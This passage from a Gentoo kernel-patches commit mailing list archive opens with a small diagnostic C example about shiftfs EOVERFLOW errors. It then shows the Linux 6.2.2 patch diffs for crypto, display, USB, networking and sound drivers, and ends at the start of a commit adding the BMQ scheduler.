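The EOVERFLOW failure mode addressed above is visible to ordinary, unprivileged
code as a plain errno from everyday syscalls. As a minimal illustrative sketch
(not part of the patch; /mnt/shift/file stands in for any path on an affected
shiftfs mount inside a container):

    #include <errno.h>
    #include <stdio.h>
    #include <string.h>
    #include <sys/stat.h>

    int main(void)
    {
            struct stat st;

            /* placeholder path on a hypothetical shiftfs mountpoint */
            if (stat("/mnt/shift/file", &st) == -1) {
                    if (errno == EOVERFLOW)
                            fprintf(stderr, "ids not representable: %s\n",
                                    strerror(errno));
                    else
                            fprintf(stderr, "stat: %s\n", strerror(errno));
                    return 1;
            }
            printf("uid=%u gid=%u\n", (unsigned)st.st_uid, (unsigned)st.st_gid);
            return 0;
    }

With the is_idmapped_mnt() check added above, shiftfs refuses idmapped lower
mounts up front with EINVAL rather than letting such operations fail later
with EOVERFLOW.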


^ permalink raw reply related	[flat|nested] 30+ messages in thread
* [gentoo-commits] proj/linux-patches:6.2 commit in: /
@ 2023-03-03 12:27 Mike Pagano
  0 siblings, 0 replies; 30+ messages in thread
From: Mike Pagano @ 2023-03-03 12:27 UTC (permalink / raw
  To: gentoo-commits

commit:     6104eea26c521a7aaa63ea1c1f5bec42bfe213fe
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Fri Mar  3 12:27:38 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Fri Mar  3 12:27:38 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=6104eea2

Linux patch 6.2.2

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README            |   4 +
 1001_linux-6.2.2.patch | 560 +++++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 564 insertions(+)

diff --git a/0000_README b/0000_README
index b0db3406..b2b768d6 100644
--- a/0000_README
+++ b/0000_README
@@ -47,6 +47,10 @@ Patch:  1000_linux-6.2.1.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.2.1
 
+Patch:  1001_linux-6.2.2.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.2.2
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1001_linux-6.2.2.patch b/1001_linux-6.2.2.patch
new file mode 100644
index 00000000..d24dc949
--- /dev/null
+++ b/1001_linux-6.2.2.patch
@@ -0,0 +1,560 @@
+diff --git a/Makefile b/Makefile
+index f26824f367a99..1836ddaf2c94c 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 2
+-SUBLEVEL = 1
++SUBLEVEL = 2
+ EXTRAVERSION =
+ NAME = Hurr durr I'ma ninja sloth
+ 
+diff --git a/arch/arm64/boot/dts/socionext/uniphier-pxs3-ref-gadget0.dts b/arch/arm64/boot/dts/socionext/uniphier-pxs3-ref-gadget0.dts
+index 7069f51bc120e..99136adb1857f 100644
+--- a/arch/arm64/boot/dts/socionext/uniphier-pxs3-ref-gadget0.dts
++++ b/arch/arm64/boot/dts/socionext/uniphier-pxs3-ref-gadget0.dts
+@@ -24,7 +24,7 @@
+ 	snps,dis_enblslpm_quirk;
+ 	snps,dis_u2_susphy_quirk;
+ 	snps,dis_u3_susphy_quirk;
+-	snps,usb2_gadget_lpm_disable;
++	snps,usb2-gadget-lpm-disable;
+ 	phy-names = "usb2-phy", "usb3-phy";
+ 	phys = <&usb0_hsphy0>, <&usb0_ssphy0>;
+ };
+diff --git a/arch/arm64/boot/dts/socionext/uniphier-pxs3-ref-gadget1.dts b/arch/arm64/boot/dts/socionext/uniphier-pxs3-ref-gadget1.dts
+index a3cfa8113ffb2..4c960f455461c 100644
+--- a/arch/arm64/boot/dts/socionext/uniphier-pxs3-ref-gadget1.dts
++++ b/arch/arm64/boot/dts/socionext/uniphier-pxs3-ref-gadget1.dts
+@@ -24,7 +24,7 @@
+ 	snps,dis_enblslpm_quirk;
+ 	snps,dis_u2_susphy_quirk;
+ 	snps,dis_u3_susphy_quirk;
+-	snps,usb2_gadget_lpm_disable;
++	snps,usb2-gadget-lpm-disable;
+ 	phy-names = "usb2-phy", "usb3-phy";
+ 	phys = <&usb1_hsphy0>, <&usb1_ssphy0>;
+ };
+diff --git a/arch/arm64/crypto/sm4-ce-gcm-glue.c b/arch/arm64/crypto/sm4-ce-gcm-glue.c
+index c450a2025ca9a..73bfb6972d3a3 100644
+--- a/arch/arm64/crypto/sm4-ce-gcm-glue.c
++++ b/arch/arm64/crypto/sm4-ce-gcm-glue.c
+@@ -135,22 +135,23 @@ static void gcm_calculate_auth_mac(struct aead_request *req, u8 ghash[])
+ }
+ 
+ static int gcm_crypt(struct aead_request *req, struct skcipher_walk *walk,
+-		     struct sm4_gcm_ctx *ctx, u8 ghash[],
++		     u8 ghash[], int err,
+ 		     void (*sm4_ce_pmull_gcm_crypt)(const u32 *rkey_enc,
+ 				u8 *dst, const u8 *src, u8 *iv,
+ 				unsigned int nbytes, u8 *ghash,
+ 				const u8 *ghash_table, const u8 *lengths))
+ {
++	struct crypto_aead *aead = crypto_aead_reqtfm(req);
++	struct sm4_gcm_ctx *ctx = crypto_aead_ctx(aead);
+ 	u8 __aligned(8) iv[SM4_BLOCK_SIZE];
+ 	be128 __aligned(8) lengths;
+-	int err;
+ 
+ 	memset(ghash, 0, SM4_BLOCK_SIZE);
+ 
+ 	lengths.a = cpu_to_be64(req->assoclen * 8);
+ 	lengths.b = cpu_to_be64(walk->total * 8);
+ 
+-	memcpy(iv, walk->iv, GCM_IV_SIZE);
++	memcpy(iv, req->iv, GCM_IV_SIZE);
+ 	put_unaligned_be32(2, iv + GCM_IV_SIZE);
+ 
+ 	kernel_neon_begin();
+@@ -158,49 +159,51 @@ static int gcm_crypt(struct aead_request *req, struct skcipher_walk *walk,
+ 	if (req->assoclen)
+ 		gcm_calculate_auth_mac(req, ghash);
+ 
+-	do {
++	while (walk->nbytes) {
+ 		unsigned int tail = walk->nbytes % SM4_BLOCK_SIZE;
+ 		const u8 *src = walk->src.virt.addr;
+ 		u8 *dst = walk->dst.virt.addr;
+ 
+ 		if (walk->nbytes == walk->total) {
+-			tail = 0;
+-
+ 			sm4_ce_pmull_gcm_crypt(ctx->key.rkey_enc, dst, src, iv,
+ 					       walk->nbytes, ghash,
+ 					       ctx->ghash_table,
+ 					       (const u8 *)&lengths);
+-		} else if (walk->nbytes - tail) {
+-			sm4_ce_pmull_gcm_crypt(ctx->key.rkey_enc, dst, src, iv,
+-					       walk->nbytes - tail, ghash,
+-					       ctx->ghash_table, NULL);
++
++			kernel_neon_end();
++
++			return skcipher_walk_done(walk, 0);
+ 		}
+ 
++		sm4_ce_pmull_gcm_crypt(ctx->key.rkey_enc, dst, src, iv,
++				       walk->nbytes - tail, ghash,
++				       ctx->ghash_table, NULL);
++
+ 		kernel_neon_end();
+ 
+ 		err = skcipher_walk_done(walk, tail);
+-		if (err)
+-			return err;
+-		if (walk->nbytes)
+-			kernel_neon_begin();
+-	} while (walk->nbytes > 0);
+ 
+-	return 0;
++		kernel_neon_begin();
++	}
++
++	sm4_ce_pmull_gcm_crypt(ctx->key.rkey_enc, NULL, NULL, iv,
++			       walk->nbytes, ghash, ctx->ghash_table,
++			       (const u8 *)&lengths);
++
++	kernel_neon_end();
++
++	return err;
+ }
+ 
+ static int gcm_encrypt(struct aead_request *req)
+ {
+ 	struct crypto_aead *aead = crypto_aead_reqtfm(req);
+-	struct sm4_gcm_ctx *ctx = crypto_aead_ctx(aead);
+ 	u8 __aligned(8) ghash[SM4_BLOCK_SIZE];
+ 	struct skcipher_walk walk;
+ 	int err;
+ 
+ 	err = skcipher_walk_aead_encrypt(&walk, req, false);
+-	if (err)
+-		return err;
+-
+-	err = gcm_crypt(req, &walk, ctx, ghash, sm4_ce_pmull_gcm_enc);
++	err = gcm_crypt(req, &walk, ghash, err, sm4_ce_pmull_gcm_enc);
+ 	if (err)
+ 		return err;
+ 
+@@ -215,17 +218,13 @@ static int gcm_decrypt(struct aead_request *req)
+ {
+ 	struct crypto_aead *aead = crypto_aead_reqtfm(req);
+ 	unsigned int authsize = crypto_aead_authsize(aead);
+-	struct sm4_gcm_ctx *ctx = crypto_aead_ctx(aead);
+ 	u8 __aligned(8) ghash[SM4_BLOCK_SIZE];
+ 	u8 authtag[SM4_BLOCK_SIZE];
+ 	struct skcipher_walk walk;
+ 	int err;
+ 
+ 	err = skcipher_walk_aead_decrypt(&walk, req, false);
+-	if (err)
+-		return err;
+-
+-	err = gcm_crypt(req, &walk, ctx, ghash, sm4_ce_pmull_gcm_dec);
++	err = gcm_crypt(req, &walk, ghash, err, sm4_ce_pmull_gcm_dec);
+ 	if (err)
+ 		return err;
+ 
+diff --git a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+index 9c7b69d377bd3..af16d6bb974b7 100644
+--- a/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
++++ b/drivers/gpu/drm/amd/display/amdgpu_dm/amdgpu_dm.c
+@@ -10359,6 +10359,7 @@ int amdgpu_dm_process_dmub_aux_transfer_sync(
+ 	ret = p_notify->aux_reply.length;
+ 	*operation_result = p_notify->result;
+ out:
++	reinit_completion(&adev->dm.dmub_aux_transfer_done);
+ 	mutex_unlock(&adev->dm.dpia_aux_lock);
+ 	return ret;
+ }
+@@ -10386,6 +10387,8 @@ int amdgpu_dm_process_dmub_set_config_sync(
+ 		*operation_result = SET_CONFIG_UNKNOWN_ERROR;
+ 	}
+ 
++	if (!is_cmd_complete)
++		reinit_completion(&adev->dm.dmub_aux_transfer_done);
+ 	mutex_unlock(&adev->dm.dpia_aux_lock);
+ 	return ret;
+ }
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_hwseq.c b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_hwseq.c
+index a0741794db62a..8e824dc81dede 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_hwseq.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_hwseq.c
+@@ -391,3 +391,27 @@ void dcn314_set_pixels_per_cycle(struct pipe_ctx *pipe_ctx)
+ 		pipe_ctx->stream_res.stream_enc->funcs->set_input_mode(pipe_ctx->stream_res.stream_enc,
+ 				pix_per_cycle);
+ }
++
++void dcn314_hubp_pg_control(struct dce_hwseq *hws, unsigned int hubp_inst, bool power_on)
++{
++	struct dc_context *ctx = hws->ctx;
++	union dmub_rb_cmd cmd;
++
++	if (hws->ctx->dc->debug.disable_hubp_power_gate)
++		return;
++
++	PERF_TRACE();
++
++	memset(&cmd, 0, sizeof(cmd));
++	cmd.domain_control.header.type = DMUB_CMD__VBIOS;
++	cmd.domain_control.header.sub_type = DMUB_CMD__VBIOS_DOMAIN_CONTROL;
++	cmd.domain_control.header.payload_bytes = sizeof(cmd.domain_control.data);
++	cmd.domain_control.data.inst = hubp_inst;
++	cmd.domain_control.data.power_gate = !power_on;
++
++	dc_dmub_srv_cmd_queue(ctx->dmub_srv, &cmd);
++	dc_dmub_srv_cmd_execute(ctx->dmub_srv);
++	dc_dmub_srv_wait_idle(ctx->dmub_srv);
++
++	PERF_TRACE();
++}
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_hwseq.h b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_hwseq.h
+index 244280298212c..c419d3dbdfee6 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_hwseq.h
++++ b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_hwseq.h
+@@ -41,4 +41,6 @@ unsigned int dcn314_calculate_dccg_k1_k2_values(struct pipe_ctx *pipe_ctx, unsig
+ 
+ void dcn314_set_pixels_per_cycle(struct pipe_ctx *pipe_ctx);
+ 
++void dcn314_hubp_pg_control(struct dce_hwseq *hws, unsigned int hubp_inst, bool power_on);
++
+ #endif /* __DC_HWSS_DCN314_H__ */
+diff --git a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_init.c b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_init.c
+index 31feb4b0edee9..25f345ff6c8f0 100644
+--- a/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_init.c
++++ b/drivers/gpu/drm/amd/display/dc/dcn314/dcn314_init.c
+@@ -137,7 +137,7 @@ static const struct hwseq_private_funcs dcn314_private_funcs = {
+ 	.plane_atomic_disable = dcn20_plane_atomic_disable,
+ 	.plane_atomic_power_down = dcn10_plane_atomic_power_down,
+ 	.enable_power_gating_plane = dcn314_enable_power_gating_plane,
+-	.hubp_pg_control = dcn31_hubp_pg_control,
++	.hubp_pg_control = dcn314_hubp_pg_control,
+ 	.program_all_writeback_pipes_in_tree = dcn30_program_all_writeback_pipes_in_tree,
+ 	.update_odm = dcn314_update_odm,
+ 	.dsc_pg_control = dcn314_dsc_pg_control,
+diff --git a/drivers/gpu/drm/amd/display/dmub/inc/dmub_cmd.h b/drivers/gpu/drm/amd/display/dmub/inc/dmub_cmd.h
+index 33907feefebbd..8fea8e42cc174 100644
+--- a/drivers/gpu/drm/amd/display/dmub/inc/dmub_cmd.h
++++ b/drivers/gpu/drm/amd/display/dmub/inc/dmub_cmd.h
+@@ -457,6 +457,10 @@ enum dmub_cmd_vbios_type {
+ 	 * Query DP alt status on a transmitter.
+ 	 */
+ 	DMUB_CMD__VBIOS_TRANSMITTER_QUERY_DP_ALT  = 26,
++	/**
++	 * Controls domain power gating
++	 */
++	DMUB_CMD__VBIOS_DOMAIN_CONTROL = 28,
+ };
+ 
+ //==============================================================================
+@@ -1204,6 +1208,23 @@ struct dmub_rb_cmd_dig1_transmitter_control {
+ 	union dmub_cmd_dig1_transmitter_control_data transmitter_control; /**< payload */
+ };
+ 
++/**
++ * struct dmub_rb_cmd_domain_control_data - Data for DOMAIN power control
++ */
++struct dmub_rb_cmd_domain_control_data {
++	uint8_t inst : 6; /**< DOMAIN instance to control */
++	uint8_t power_gate : 1; /**< 1=power gate, 0=power up */
++	uint8_t reserved[3]; /**< Reserved for future use */
++};
++
++/**
++ * struct dmub_rb_cmd_domain_control - Controls DOMAIN power gating
++ */
++struct dmub_rb_cmd_domain_control {
++	struct dmub_cmd_header header; /**< header */
++	struct dmub_rb_cmd_domain_control_data data; /**< payload */
++};
++
+ /**
+  * DPIA tunnel command parameters.
+  */
+@@ -3231,6 +3252,10 @@ union dmub_rb_cmd {
+ 	 * Definition of a DMUB_CMD__VBIOS_DIG1_TRANSMITTER_CONTROL command.
+ 	 */
+ 	struct dmub_rb_cmd_dig1_transmitter_control dig1_transmitter_control;
++	/**
++	 * Definition of a DMUB_CMD__VBIOS_DOMAIN_CONTROL command.
++	 */
++	struct dmub_rb_cmd_domain_control domain_control;
+ 	/**
+ 	 * Definition of a DMUB_CMD__PSR_SET_VERSION command.
+ 	 */
+diff --git a/drivers/net/wireless/realtek/rtw88/usb.c b/drivers/net/wireless/realtek/rtw88/usb.c
+index 4ef38279b64c9..2a8336b1847a5 100644
+--- a/drivers/net/wireless/realtek/rtw88/usb.c
++++ b/drivers/net/wireless/realtek/rtw88/usb.c
+@@ -271,6 +271,7 @@ static int rtw_usb_write_port(struct rtw_dev *rtwdev, u8 qsel, struct sk_buff *s
+ 		return -ENOMEM;
+ 
+ 	usb_fill_bulk_urb(urb, usbd, pipe, skb->data, skb->len, cb, context);
++	urb->transfer_flags |= URB_ZERO_PACKET;
+ 	ret = usb_submit_urb(urb, GFP_ATOMIC);
+ 
+ 	usb_free_urb(urb);
+@@ -413,24 +414,11 @@ static int rtw_usb_write_data_rsvd_page(struct rtw_dev *rtwdev, u8 *buf,
+ 					u32 size)
+ {
+ 	const struct rtw_chip_info *chip = rtwdev->chip;
+-	struct rtw_usb *rtwusb;
+ 	struct rtw_tx_pkt_info pkt_info = {0};
+-	u32 len, desclen;
+-
+-	rtwusb = rtw_get_usb_priv(rtwdev);
+ 
+ 	pkt_info.tx_pkt_size = size;
+ 	pkt_info.qsel = TX_DESC_QSEL_BEACON;
+-
+-	desclen = chip->tx_pkt_desc_sz;
+-	len = desclen + size;
+-	if (len % rtwusb->bulkout_size == 0) {
+-		len += RTW_USB_PACKET_OFFSET_SZ;
+-		pkt_info.offset = desclen + RTW_USB_PACKET_OFFSET_SZ;
+-		pkt_info.pkt_offset = 1;
+-	} else {
+-		pkt_info.offset = desclen;
+-	}
++	pkt_info.offset = chip->tx_pkt_desc_sz;
+ 
+ 	return rtw_usb_write_data(rtwdev, &pkt_info, buf);
+ }
+@@ -471,9 +459,9 @@ static int rtw_usb_tx_write(struct rtw_dev *rtwdev,
+ 	u8 *pkt_desc;
+ 	int ep;
+ 
++	pkt_info->qsel = rtw_usb_tx_queue_mapping_to_qsel(skb);
+ 	pkt_desc = skb_push(skb, chip->tx_pkt_desc_sz);
+ 	memset(pkt_desc, 0, chip->tx_pkt_desc_sz);
+-	pkt_info->qsel = rtw_usb_tx_queue_mapping_to_qsel(skb);
+ 	ep = qsel_to_ep(rtwusb, pkt_info->qsel);
+ 	rtw_tx_fill_tx_desc(pkt_info, skb);
+ 	rtw_tx_fill_txdesc_checksum(rtwdev, pkt_info, skb->data);
+diff --git a/drivers/tty/vt/vc_screen.c b/drivers/tty/vt/vc_screen.c
+index f566eb1839dc5..71e091f879f0e 100644
+--- a/drivers/tty/vt/vc_screen.c
++++ b/drivers/tty/vt/vc_screen.c
+@@ -403,10 +403,11 @@ vcs_read(struct file *file, char __user *buf, size_t count, loff_t *ppos)
+ 		unsigned int this_round, skip = 0;
+ 		int size;
+ 
+-		ret = -ENXIO;
+ 		vc = vcs_vc(inode, &viewed);
+-		if (!vc)
+-			goto unlock_out;
++		if (!vc) {
++			ret = -ENXIO;
++			break;
++		}
+ 
+ 		/* Check whether we are above size each round,
+ 		 * as copy_to_user at the end of this loop
+diff --git a/drivers/usb/core/hub.c b/drivers/usb/core/hub.c
+index 9eca403af2a85..97a0f8faea6e5 100644
+--- a/drivers/usb/core/hub.c
++++ b/drivers/usb/core/hub.c
+@@ -2389,9 +2389,8 @@ static int usb_enumerate_device_otg(struct usb_device *udev)
+  * usb_enumerate_device - Read device configs/intfs/otg (usbcore-internal)
+  * @udev: newly addressed device (in ADDRESS state)
+  *
+- * This is only called by usb_new_device() and usb_authorize_device()
+- * and FIXME -- all comments that apply to them apply here wrt to
+- * environment.
++ * This is only called by usb_new_device() -- all comments that apply there
++ * apply here wrt to environment.
+  *
+  * If the device is WUSB and not authorized, we don't attempt to read
+  * the string descriptors, as they will be errored out by the device
+diff --git a/drivers/usb/core/sysfs.c b/drivers/usb/core/sysfs.c
+index 8217032dfb85f..b63f78e48c74e 100644
+--- a/drivers/usb/core/sysfs.c
++++ b/drivers/usb/core/sysfs.c
+@@ -869,11 +869,7 @@ read_descriptors(struct file *filp, struct kobject *kobj,
+ 	size_t srclen, n;
+ 	int cfgno;
+ 	void *src;
+-	int retval;
+ 
+-	retval = usb_lock_device_interruptible(udev);
+-	if (retval < 0)
+-		return -EINTR;
+ 	/* The binary attribute begins with the device descriptor.
+ 	 * Following that are the raw descriptor entries for all the
+ 	 * configurations (config plus subsidiary descriptors).
+@@ -898,7 +894,6 @@ read_descriptors(struct file *filp, struct kobject *kobj,
+ 			off -= srclen;
+ 		}
+ 	}
+-	usb_unlock_device(udev);
+ 	return count - nleft;
+ }
+ 
+diff --git a/drivers/usb/dwc3/dwc3-pci.c b/drivers/usb/dwc3/dwc3-pci.c
+index 89c9ab2b19f85..a23ddbb819795 100644
+--- a/drivers/usb/dwc3/dwc3-pci.c
++++ b/drivers/usb/dwc3/dwc3-pci.c
+@@ -47,6 +47,7 @@
+ #define PCI_DEVICE_ID_INTEL_ADLS		0x7ae1
+ #define PCI_DEVICE_ID_INTEL_RPL			0xa70e
+ #define PCI_DEVICE_ID_INTEL_RPLS		0x7a61
++#define PCI_DEVICE_ID_INTEL_MTLM		0x7eb1
+ #define PCI_DEVICE_ID_INTEL_MTLP		0x7ec1
+ #define PCI_DEVICE_ID_INTEL_MTL			0x7e7e
+ #define PCI_DEVICE_ID_INTEL_TGL			0x9a15
+@@ -467,6 +468,9 @@ static const struct pci_device_id dwc3_pci_id_table[] = {
+ 	{ PCI_VDEVICE(INTEL, PCI_DEVICE_ID_INTEL_RPLS),
+ 	  (kernel_ulong_t) &dwc3_pci_intel_swnode, },
+ 
++	{ PCI_VDEVICE(INTEL, PCI_DEVICE_ID_INTEL_MTLM),
++	  (kernel_ulong_t) &dwc3_pci_intel_swnode, },
++
+ 	{ PCI_VDEVICE(INTEL, PCI_DEVICE_ID_INTEL_MTLP),
+ 	  (kernel_ulong_t) &dwc3_pci_intel_swnode, },
+ 
+diff --git a/drivers/usb/gadget/function/u_serial.c b/drivers/usb/gadget/function/u_serial.c
+index 840626e064e13..a0ca47fbff0fc 100644
+--- a/drivers/usb/gadget/function/u_serial.c
++++ b/drivers/usb/gadget/function/u_serial.c
+@@ -82,6 +82,9 @@
+ #define WRITE_BUF_SIZE		8192		/* TX only */
+ #define GS_CONSOLE_BUF_SIZE	8192
+ 
++/* Prevents race conditions while accessing gser->ioport */
++static DEFINE_SPINLOCK(serial_port_lock);
++
+ /* console info */
+ struct gs_console {
+ 	struct console		console;
+@@ -1375,8 +1378,10 @@ void gserial_disconnect(struct gserial *gser)
+ 	if (!port)
+ 		return;
+ 
++	spin_lock_irqsave(&serial_port_lock, flags);
++
+ 	/* tell the TTY glue not to do I/O here any more */
+-	spin_lock_irqsave(&port->port_lock, flags);
++	spin_lock(&port->port_lock);
+ 
+ 	gs_console_disconnect(port);
+ 
+@@ -1391,7 +1396,8 @@ void gserial_disconnect(struct gserial *gser)
+ 			tty_hangup(port->port.tty);
+ 	}
+ 	port->suspended = false;
+-	spin_unlock_irqrestore(&port->port_lock, flags);
++	spin_unlock(&port->port_lock);
++	spin_unlock_irqrestore(&serial_port_lock, flags);
+ 
+ 	/* disable endpoints, aborting down any active I/O */
+ 	usb_ep_disable(gser->out);
+@@ -1425,10 +1431,19 @@ EXPORT_SYMBOL_GPL(gserial_suspend);
+ 
+ void gserial_resume(struct gserial *gser)
+ {
+-	struct gs_port *port = gser->ioport;
++	struct gs_port *port;
+ 	unsigned long	flags;
+ 
+-	spin_lock_irqsave(&port->port_lock, flags);
++	spin_lock_irqsave(&serial_port_lock, flags);
++	port = gser->ioport;
++
++	if (!port) {
++		spin_unlock_irqrestore(&serial_port_lock, flags);
++		return;
++	}
++
++	spin_lock(&port->port_lock);
++	spin_unlock(&serial_port_lock);
+ 	port->suspended = false;
+ 	if (!port->start_delayed) {
+ 		spin_unlock_irqrestore(&port->port_lock, flags);
+diff --git a/drivers/usb/serial/option.c b/drivers/usb/serial/option.c
+index ee5ac4ef7e162..e6d8d9b35ad0e 100644
+--- a/drivers/usb/serial/option.c
++++ b/drivers/usb/serial/option.c
+@@ -402,6 +402,8 @@ static void option_instat_callback(struct urb *urb);
+ #define LONGCHEER_VENDOR_ID			0x1c9e
+ 
+ /* 4G Systems products */
++/* This one was sold as the VW and Skoda "Carstick LTE" */
++#define FOUR_G_SYSTEMS_PRODUCT_CARSTICK_LTE	0x7605
+ /* This is the 4G XS Stick W14 a.k.a. Mobilcom Debitel Surf-Stick *
+  * It seems to contain a Qualcomm QSC6240/6290 chipset            */
+ #define FOUR_G_SYSTEMS_PRODUCT_W14		0x9603
+@@ -1976,6 +1978,8 @@ static const struct usb_device_id option_ids[] = {
+ 	  .driver_info = RSVD(2) },
+ 	{ USB_DEVICE(AIRPLUS_VENDOR_ID, AIRPLUS_PRODUCT_MCD650) },
+ 	{ USB_DEVICE(TLAYTECH_VENDOR_ID, TLAYTECH_PRODUCT_TEU800) },
++	{ USB_DEVICE(LONGCHEER_VENDOR_ID, FOUR_G_SYSTEMS_PRODUCT_CARSTICK_LTE),
++	  .driver_info = RSVD(0) },
+ 	{ USB_DEVICE(LONGCHEER_VENDOR_ID, FOUR_G_SYSTEMS_PRODUCT_W14),
+ 	  .driver_info = NCTRL(0) | NCTRL(1) },
+ 	{ USB_DEVICE(LONGCHEER_VENDOR_ID, FOUR_G_SYSTEMS_PRODUCT_W100),
+diff --git a/drivers/usb/typec/pd.c b/drivers/usb/typec/pd.c
+index dc72005d68db9..b5ab26422c349 100644
+--- a/drivers/usb/typec/pd.c
++++ b/drivers/usb/typec/pd.c
+@@ -161,7 +161,6 @@ static struct device_type source_fixed_supply_type = {
+ 
+ static struct attribute *sink_fixed_supply_attrs[] = {
+ 	&dev_attr_dual_role_power.attr,
+-	&dev_attr_usb_suspend_supported.attr,
+ 	&dev_attr_unconstrained_power.attr,
+ 	&dev_attr_usb_communication_capable.attr,
+ 	&dev_attr_dual_role_data.attr,
+diff --git a/net/core/filter.c b/net/core/filter.c
+index 43cc1fe58a2c6..a00a4b5476d45 100644
+--- a/net/core/filter.c
++++ b/net/core/filter.c
+@@ -5816,7 +5816,7 @@ static int bpf_ipv4_fib_lookup(struct net *net, struct bpf_fib_lookup *params,
+ 		neigh = __ipv6_neigh_lookup_noref_stub(dev, dst);
+ 	}
+ 
+-	if (!neigh)
++	if (!neigh || !(neigh->nud_state & NUD_VALID))
+ 		return BPF_FIB_LKUP_RET_NO_NEIGH;
+ 
+ 	return bpf_fib_set_fwd_params(params, neigh, dev, mtu);
+@@ -5931,7 +5931,7 @@ static int bpf_ipv6_fib_lookup(struct net *net, struct bpf_fib_lookup *params,
+ 	 * not needed here.
+ 	 */
+ 	neigh = __ipv6_neigh_lookup_noref_stub(dev, dst);
+-	if (!neigh)
++	if (!neigh || !(neigh->nud_state & NUD_VALID))
+ 		return BPF_FIB_LKUP_RET_NO_NEIGH;
+ 
+ 	return bpf_fib_set_fwd_params(params, neigh, dev, mtu);
+diff --git a/scripts/tags.sh b/scripts/tags.sh
+index e137cf15aae9d..0d045182c08c0 100755
+--- a/scripts/tags.sh
++++ b/scripts/tags.sh
+@@ -91,7 +91,7 @@ all_compiled_sources()
+ 	{
+ 		echo include/generated/autoconf.h
+ 		find $ignore -name "*.cmd" -exec \
+-			grep -Poh '(?(?=^source_.* \K).*|(?=^  \K\S).*(?= \\))' {} \+ |
++			sed -n -E 's/^source_.* (.*)/\1/p; s/^  (\S.*) \\/\1/p' {} \+ |
+ 		awk '!a[$0]++'
+ 	} | xargs realpath -esq $([ -z "$KBUILD_ABS_SRCTREE" ] && echo --relative-to=.) |
+ 	sort -u
+diff --git a/sound/pci/hda/hda_cs_dsp_ctl.c b/sound/pci/hda/hda_cs_dsp_ctl.c
+index 5433f6227ac9f..463ca06036bfe 100644
+--- a/sound/pci/hda/hda_cs_dsp_ctl.c
++++ b/sound/pci/hda/hda_cs_dsp_ctl.c
+@@ -218,10 +218,10 @@ int hda_cs_dsp_write_ctl(struct cs_dsp *dsp, const char *name, int type,
+ 	cs_ctl = cs_dsp_get_ctl(dsp, name, type, alg);
+ 	ret = cs_dsp_coeff_write_ctrl(cs_ctl, 0, buf, len);
+ 	mutex_unlock(&dsp->pwr_lock);
+-	if (ret)
++	if (ret < 0)
+ 		return ret;
+ 
+-	if (cs_ctl->flags & WMFW_CTL_FLAG_SYS)
++	if (ret == 0 || (cs_ctl->flags & WMFW_CTL_FLAG_SYS))
+ 		return 0;
+ 
+ 	ctl = cs_ctl->priv;


^ permalink raw reply related	[flat|nested] 30+ messages in thread
* [gentoo-commits] proj/linux-patches:6.2 commit in: /
@ 2023-02-27 18:45 Mike Pagano
  0 siblings, 0 replies; 30+ messages in thread
From: Mike Pagano @ 2023-02-27 18:45 UTC (permalink / raw
  To: gentoo-commits

commit:     26c13af1abdb1a80f16f5de399d1029781be3e1d
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Mon Feb 27 18:45:22 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Mon Feb 27 18:45:22 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=26c13af1

Add BMQ Scheduler, USE=experimental

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                                 |     8 +
 5020_BMQ-and-PDS-io-scheduler-v6.2-r0.patch | 10270 ++++++++++++++++++++++++++
 5021_BMQ-and-PDS-gentoo-defaults.patch      |    13 +
 3 files changed, 10291 insertions(+)

diff --git a/0000_README b/0000_README
index ae528a67..b0db3406 100644
--- a/0000_README
+++ b/0000_README
@@ -90,3 +90,11 @@ Desc:   Kernel module that provides a kernel filesystem for uid/gid shifting
 Patch:  5010_enable-cpu-optimizations-universal.patch
 From:   https://github.com/graysky2/kernel_compiler_patch
 Desc:   Kernel >= 5.15 patch enables gcc = v11.1+ optimizations for additional CPUs.
+
+Patch:  5020_BMQ-and-PDS-io-scheduler-v6.2-r0.patch
+From:   https://github.com/Frogging-Family/linux-tkg https://gitlab.com/alfredchen/projectc
+Desc:   BMQ (BitMap Queue) Scheduler. A new CPU scheduler developed from PDS (included). Inspired by the scheduler in Zircon.
+
+Patch:  5021_BMQ-and-PDS-gentoo-defaults.patch
+From:   https://gitweb.gentoo.org/proj/linux-patches.git/
+Desc:   Set defaults for BMQ. Add archs as people test, default to N

diff --git a/5020_BMQ-and-PDS-io-scheduler-v6.2-r0.patch b/5020_BMQ-and-PDS-io-scheduler-v6.2-r0.patch
new file mode 100644
index 00000000..fd815b76
--- /dev/null
+++ b/5020_BMQ-and-PDS-io-scheduler-v6.2-r0.patch
@@ -0,0 +1,10270 @@
+diff --git a/Documentation/admin-guide/kernel-parameters.txt b/Documentation/admin-guide/kernel-parameters.txt
